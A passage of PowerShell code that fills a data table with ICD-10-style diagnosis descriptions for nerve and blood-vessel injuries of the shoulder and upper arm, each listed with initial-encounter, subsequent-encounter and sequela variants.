$DiagnosisList.Rows.Add("Injury of median nerve at upper arm level, right arm","Injury of median nerve at upper arm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at upper arm level, right arm","Injury of median nerve at upper arm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at upper arm level, left arm","Injury of median nerve at upper arm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at upper arm level, left arm","Injury of median nerve at upper arm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at upper arm level, left arm","Injury of median nerve at upper arm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at upper arm level, unspecified arm","Injury of radial nerve at upper arm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at upper arm level, unspecified arm","Injury of radial nerve at upper arm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at upper arm level, unspecified arm","Injury of radial nerve at upper arm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at upper arm level, right arm","Injury of radial nerve at upper arm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at upper arm level, right arm","Injury of radial nerve at upper arm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at upper arm level, right arm","Injury of radial nerve at upper arm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at upper arm level, left arm","Injury of radial nerve at upper arm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at upper arm level, left arm","Injury of radial nerve at upper arm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at upper arm level, left arm","Injury of radial nerve at upper arm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of axillary nerve, unspecified arm","Injury of axillary nerve, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of axillary nerve, unspecified arm","Injury of axillary nerve, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of axillary nerve, unspecified arm","Injury of axillary nerve, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of axillary nerve, right arm","Injury of axillary nerve, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of axillary nerve, right arm","Injury of axillary nerve, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of axillary nerve, right arm","Injury of axillary nerve, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of axillary nerve, left arm","Injury of axillary nerve, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of axillary nerve, left arm","Injury of axillary nerve, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of axillary nerve, left arm","Injury of axillary nerve, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of musculocutaneous nerve, unspecified arm","Injury of musculocutaneous nerve, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of musculocutaneous nerve, unspecified arm","Injury of musculocutaneous nerve, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of musculocutaneous nerve, unspecified arm","Injury of musculocutaneous nerve, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of musculocutaneous nerve, right arm","Injury of musculocutaneous nerve, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of musculocutaneous nerve, right arm","Injury of musculocutaneous nerve, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of musculocutaneous nerve, right arm","Injury of musculocutaneous nerve, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of musculocutaneous nerve, left arm","Injury of musculocutaneous nerve, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of musculocutaneous nerve, left arm","Injury of musculocutaneous nerve, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of musculocutaneous nerve, left arm","Injury of musculocutaneous nerve, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at shoulder and upper arm level, unspecified arm","Injury of cutaneous sensory nerve at shoulder and upper arm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at shoulder and upper arm level, unspecified arm","Injury of cutaneous sensory nerve at shoulder and upper arm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at shoulder and upper arm level, unspecified arm","Injury of cutaneous sensory nerve at shoulder and upper arm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at shoulder and upper arm level, right arm","Injury of cutaneous sensory nerve at shoulder and upper arm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at shoulder and upper arm level, right arm","Injury of cutaneous sensory nerve at shoulder and upper arm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at shoulder and upper arm level, right arm","Injury of cutaneous sensory nerve at shoulder and upper arm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at shoulder and upper arm level, left arm","Injury of cutaneous sensory nerve at shoulder and upper arm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at shoulder and upper arm level, left arm","Injury of cutaneous sensory nerve at shoulder and upper arm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at shoulder and upper arm level, left arm","Injury of cutaneous sensory nerve at shoulder and upper arm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at shoulder and upper arm level, right arm","Injury of other nerves at shoulder and upper arm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at shoulder and upper arm level, right arm","Injury of other nerves at shoulder and upper arm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at shoulder and upper arm level, right arm","Injury of other nerves at shoulder and upper arm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at shoulder and upper arm level, left arm","Injury of other nerves at shoulder and upper arm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at shoulder and upper arm level, left arm","Injury of other nerves at shoulder and upper arm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at shoulder and upper arm level, left arm","Injury of other nerves at shoulder and upper arm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at shoulder and upper arm level, unspecified arm","Injury of other nerves at shoulder and upper arm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at shoulder and upper arm level, unspecified arm","Injury of other nerves at shoulder and upper arm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at shoulder and upper arm level, unspecified arm","Injury of other nerves at shoulder and upper arm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at shoulder and upper arm level, unspecified arm","Injury of unspecified nerve at shoulder and upper arm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at shoulder and upper arm level, unspecified arm","Injury of unspecified nerve at shoulder and upper arm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at shoulder and upper arm level, unspecified arm","Injury of unspecified nerve at shoulder and upper arm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at shoulder and upper arm level, right arm","Injury of unspecified nerve at shoulder and upper arm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at shoulder and upper arm level, right arm","Injury of unspecified nerve at shoulder and upper arm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at shoulder and upper arm level, right arm","Injury of unspecified nerve at shoulder and upper arm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at shoulder and upper arm level, left arm","Injury of unspecified nerve at shoulder and upper arm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at shoulder and upper arm level, left arm","Injury of unspecified nerve at shoulder and upper arm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at shoulder and upper arm level, left arm","Injury of unspecified nerve at shoulder and upper arm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of axillary artery, right side","Unspecified injury of axillary artery, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of axillary artery, right side","Unspecified injury of axillary artery, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of axillary artery, right side","Unspecified injury of axillary artery, right side, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of axillary artery, left side","Unspecified injury of axillary artery, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of axillary artery, left side","Unspecified injury of axillary artery, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of axillary artery, left side","Unspecified injury of axillary artery, left side, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of axillary artery, unspecified side","Unspecified injury of axillary artery, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of axillary artery, unspecified side","Unspecified injury of axillary artery, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of axillary artery, unspecified side","Unspecified injury of axillary artery, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of axillary artery, right side","Laceration of axillary artery, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of axillary artery, right side","Laceration of axillary artery, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of axillary artery, right side","Laceration of axillary artery, right side, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of axillary artery, left side","Laceration of axillary artery, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of axillary artery, left side","Laceration of axillary artery, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of axillary artery, left side","Laceration of axillary artery, left side, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of axillary artery, unspecified side","Laceration of axillary artery, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of axillary artery, unspecified side","Laceration of axillary artery, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of axillary artery, unspecified side","Laceration of axillary artery, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of axillary artery, right side","Other specified injury of axillary artery, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of axillary artery, right side","Other specified injury of axillary artery, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of axillary artery, right side","Other specified injury of axillary artery, right side, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of axillary artery, left side","Other specified injury of axillary artery, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of axillary artery, left side","Other specified injury of axillary artery, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of axillary artery, left side","Other specified injury of axillary artery, left side, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of axillary artery, unspecified side","Other specified injury of axillary artery, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of axillary artery, unspecified side","Other specified injury of axillary artery, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of axillary artery, unspecified side","Other specified injury of axillary artery, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of brachial artery, right side","Unspecified injury of brachial artery, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of brachial artery, right side","Unspecified injury of brachial artery, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of brachial artery, right side","Unspecified injury of brachial artery, right side, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of brachial artery, left side","Unspecified injury of brachial artery, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of brachial artery, left side","Unspecified injury of brachial artery, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of brachial artery, left side","Unspecified injury of brachial artery, left side, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of brachial artery, unspecified side","Unspecified injury of brachial artery, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of brachial artery, unspecified side","Unspecified injury of brachial artery, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of brachial artery, unspecified side","Unspecified injury of brachial artery, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of brachial artery, right side","Laceration of brachial artery, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of brachial artery, right side","Laceration of brachial artery, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of brachial artery, right side","Laceration of brachial artery, right side, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of brachial artery, left side","Laceration of brachial artery, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of brachial artery, left side","Laceration of brachial artery, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of brachial artery, left side","Laceration of brachial artery, left side, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of brachial artery, unspecified side","Laceration of brachial artery, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of brachial artery, unspecified side","Laceration of brachial artery, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of brachial artery, unspecified side","Laceration of brachial artery, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of brachial artery, right side","Other specified injury of brachial artery, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of brachial artery, right side","Other specified injury of brachial artery, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of brachial artery, right side","Other specified injury of brachial artery, right side, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of brachial artery, left side","Other specified injury of brachial artery, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of brachial artery, left side","Other specified injury of brachial artery, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of brachial artery, left side","Other specified injury of brachial artery, left side, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of brachial artery, unspecified side","Other specified injury of brachial artery, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of brachial artery, unspecified side","Other specified injury of brachial artery, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of brachial artery, unspecified side","Other specified injury of brachial artery, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of axillary or brachial vein, right side","Unspecified injury of axillary or brachial vein, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of axillary or brachial vein, right side","Unspecified injury of axillary or brachial vein, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of axillary or brachial vein, right side","Unspecified injury of axillary or brachial vein, right side, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of axillary or brachial vein, left side","Unspecified injury of axillary or brachial vein, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of axillary or brachial vein, left side","Unspecified injury of axillary or brachial vein, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of axillary or brachial vein, left side","Unspecified injury of axillary or brachial vein, left side, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of axillary or brachial vein, unspecified side","Unspecified injury of axillary or brachial vein, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of axillary or brachial vein, unspecified side","Unspecified injury of axillary or brachial vein, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of axillary or brachial vein, unspecified side","Unspecified injury of axillary or brachial vein, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of axillary or brachial vein, right side","Laceration of axillary or brachial vein, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of axillary or brachial vein, right side","Laceration of axillary or brachial vein, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of axillary or brachial vein, right side","Laceration of axillary or brachial vein, right side, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of axillary or brachial vein, left side","Laceration of axillary or brachial vein, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of axillary or brachial vein, left side","Laceration of axillary or brachial vein, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of axillary or brachial vein, left side","Laceration of axillary or brachial vein, left side, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of axillary or brachial vein, unspecified side","Laceration of axillary or brachial vein, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of axillary or brachial vein, unspecified side","Laceration of axillary or brachial vein, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of axillary or brachial vein, unspecified side","Laceration of axillary or brachial vein, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of axillary or brachial vein, right side","Other specified injury of axillary or brachial vein, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of axillary or brachial vein, right side","Other specified injury of axillary or brachial vein, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of axillary or brachial vein, right side","Other specified injury of axillary or brachial vein, right side, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of axillary or brachial vein, left side","Other specified injury of axillary or brachial vein, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of axillary or brachial vein, left side","Other specified injury of axillary or brachial vein, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of axillary or brachial vein, left side","Other specified injury of axillary or brachial vein, left side, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of axillary or brachial vein, unspecified side","Other specified injury of axillary or brachial vein, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of axillary or brachial vein, unspecified side","Other specified injury of axillary or brachial vein, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of axillary or brachial vein, unspecified side","Other specified injury of axillary or brachial vein, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superficial vein at shoulder and upper arm level, right arm","Unspecified injury of superficial vein at shoulder and upper arm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superficial vein at shoulder and upper arm level, right arm","Unspecified injury of superficial vein at shoulder and upper arm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superficial vein at shoulder and upper arm level, right arm","Unspecified injury of superficial vein at shoulder and upper arm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superficial vein at shoulder and upper arm level, left arm","Unspecified injury of superficial vein at shoulder and upper arm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superficial vein at shoulder and upper arm level, left arm","Unspecified injury of superficial vein at shoulder and upper arm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superficial vein at shoulder and upper arm level, left arm","Unspecified injury of superficial vein at shoulder and upper arm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superficial vein at shoulder and upper arm level, unspecified arm","Unspecified injury of superficial vein at shoulder and upper arm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superficial vein at shoulder and upper arm level, unspecified arm","Unspecified injury of superficial vein at shoulder and upper arm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superficial vein at shoulder and upper arm level, unspecified arm","Unspecified injury of superficial vein at shoulder and upper arm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of superficial vein at shoulder and upper arm level, right arm","Laceration of superficial vein at shoulder and upper arm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of superficial vein at shoulder and upper arm level, right arm","Laceration of superficial vein at shoulder and upper arm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of superficial vein at shoulder and upper arm level, right arm","Laceration of superficial vein at shoulder and upper arm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of superficial vein at shoulder and upper arm level, left arm","Laceration of superficial vein at shoulder and upper arm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of superficial vein at shoulder and upper arm level, left arm","Laceration of superficial vein at shoulder and upper arm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of superficial vein at shoulder and upper arm level, left arm","Laceration of superficial vein at shoulder and upper arm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of superficial vein at shoulder and upper arm level, unspecified arm","Laceration of superficial vein at shoulder and upper arm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of superficial vein at shoulder and upper arm level, unspecified arm","Laceration of superficial vein at shoulder and upper arm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of superficial vein at shoulder and upper arm level, unspecified arm","Laceration of superficial vein at shoulder and upper arm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of superficial vein at shoulder and upper arm level, right arm","Other specified injury of superficial vein at shoulder and upper arm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of superficial vein at shoulder and upper arm level, right arm","Other specified injury of superficial vein at shoulder and upper arm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of superficial vein at shoulder and upper arm level, right arm","Other specified injury of superficial vein at shoulder and upper arm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of superficial vein at shoulder and upper arm level, left arm","Other specified injury of superficial vein at shoulder and upper arm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of superficial vein at shoulder and upper arm level, left arm","Other specified injury of superficial vein at shoulder and upper arm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of superficial vein at shoulder and upper arm level, left arm","Other specified injury of superficial vein at shoulder and upper arm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of superficial vein at shoulder and upper arm level, unspecified arm","Other specified injury of superficial vein at shoulder and upper arm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of superficial vein at shoulder and upper arm level, unspecified arm","Other specified injury of superficial vein at shoulder and upper arm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of superficial vein at shoulder and upper arm level, unspecified arm","Other specified injury of superficial vein at shoulder and upper arm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified blood vessels at shoulder and upper arm level, right arm","Unspecified injury of other specified blood vessels at shoulder and upper arm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified blood vessels at shoulder and upper arm level, right arm","Unspecified injury of other specified blood vessels at shoulder and upper arm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified blood vessels at shoulder and upper arm level, right arm","Unspecified injury of other specified blood vessels at shoulder and upper arm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified blood vessels at shoulder and upper arm level, left arm","Unspecified injury of other specified blood vessels at shoulder and upper arm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified blood vessels at shoulder and upper arm level, left arm","Unspecified injury of other specified blood vessels at shoulder and upper arm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified blood vessels at shoulder and upper arm level, left arm","Unspecified injury of other specified blood vessels at shoulder and upper arm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified blood vessels at shoulder and upper arm level, unspecified arm","Unspecified injury of other specified blood vessels at shoulder and upper arm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified blood vessels at shoulder and upper arm level, unspecified arm","Unspecified injury of other specified blood vessels at shoulder and upper arm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified blood vessels at shoulder and upper arm level, unspecified arm","Unspecified injury of other specified blood vessels at shoulder and upper arm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other specified blood vessels at shoulder and upper arm level, right arm","Laceration of other specified blood vessels at shoulder and upper arm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified blood vessels at shoulder and upper arm level, right arm","Laceration of other specified blood vessels at shoulder and upper arm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified blood vessels at shoulder and upper arm level, right arm","Laceration of other specified blood vessels at shoulder and upper arm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other specified blood vessels at shoulder and upper arm level, left arm","Laceration of other specified blood vessels at shoulder and upper arm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified blood vessels at shoulder and upper arm level, left arm","Laceration of other specified blood vessels at shoulder and upper arm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified blood vessels at shoulder and upper arm level, left arm","Laceration of other specified blood vessels at shoulder and upper arm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other specified blood vessels at shoulder and upper arm level, unspecified arm","Laceration of other specified blood vessels at shoulder and upper arm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified blood vessels at shoulder and upper arm level, unspecified arm","Laceration of other specified blood vessels at shoulder and upper arm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified blood vessels at shoulder and upper arm level, unspecified arm","Laceration of other specified blood vessels at shoulder and upper arm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other specified blood vessels at shoulder and upper arm level, right arm","Other specified injury of other specified blood vessels at shoulder and upper arm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other specified blood vessels at shoulder and upper arm level, right arm","Other specified injury of other specified blood vessels at shoulder and upper arm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other specified blood vessels at shoulder and upper arm level, right arm","Other specified injury of other specified blood vessels at shoulder and upper arm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other specified blood vessels at shoulder and upper arm level, left arm","Other specified injury of other specified blood vessels at shoulder and upper arm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other specified blood vessels at shoulder and upper arm level, left arm","Other specified injury of other specified blood vessels at shoulder and upper arm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other specified blood vessels at shoulder and upper arm level, left arm","Other specified injury of other specified blood vessels at shoulder and upper arm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other specified blood vessels at shoulder and upper arm level, unspecified arm","Other specified injury of other specified blood vessels at shoulder and upper arm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other specified blood vessels at shoulder and upper arm level, unspecified arm","Other specified injury of other specified blood vessels at shoulder and upper arm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other specified blood vessels at shoulder and upper arm level, unspecified arm","Other specified injury of other specified blood vessels at shoulder and upper arm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at shoulder and upper arm level, right arm","Unspecified injury of unspecified blood vessel at shoulder and upper arm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at shoulder and upper arm level, right arm","Unspecified injury of unspecified blood vessel at shoulder and upper arm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at shoulder and upper arm level, right arm","Unspecified injury of unspecified blood vessel at shoulder and upper arm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at shoulder and upper arm level, left arm","Unspecified injury of unspecified blood vessel at shoulder and upper arm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at shoulder and upper arm level, left arm","Unspecified injury of unspecified blood vessel at shoulder and upper arm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at shoulder and upper arm level, left arm","Unspecified injury of unspecified blood vessel at shoulder and upper arm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at shoulder and upper arm level, unspecified arm","Unspecified injury of unspecified blood vessel at shoulder and upper arm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at shoulder and upper arm level, unspecified arm","Unspecified injury of unspecified blood vessel at shoulder and upper arm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at shoulder and upper arm level, unspecified arm","Unspecified injury of unspecified blood vessel at shoulder and upper arm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at shoulder and upper arm level, right arm","Laceration of unspecified blood vessel at shoulder and upper arm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at shoulder and upper arm level, right arm","Laceration of unspecified blood vessel at shoulder and upper arm level, right arm, subsequent encounter") + $null = 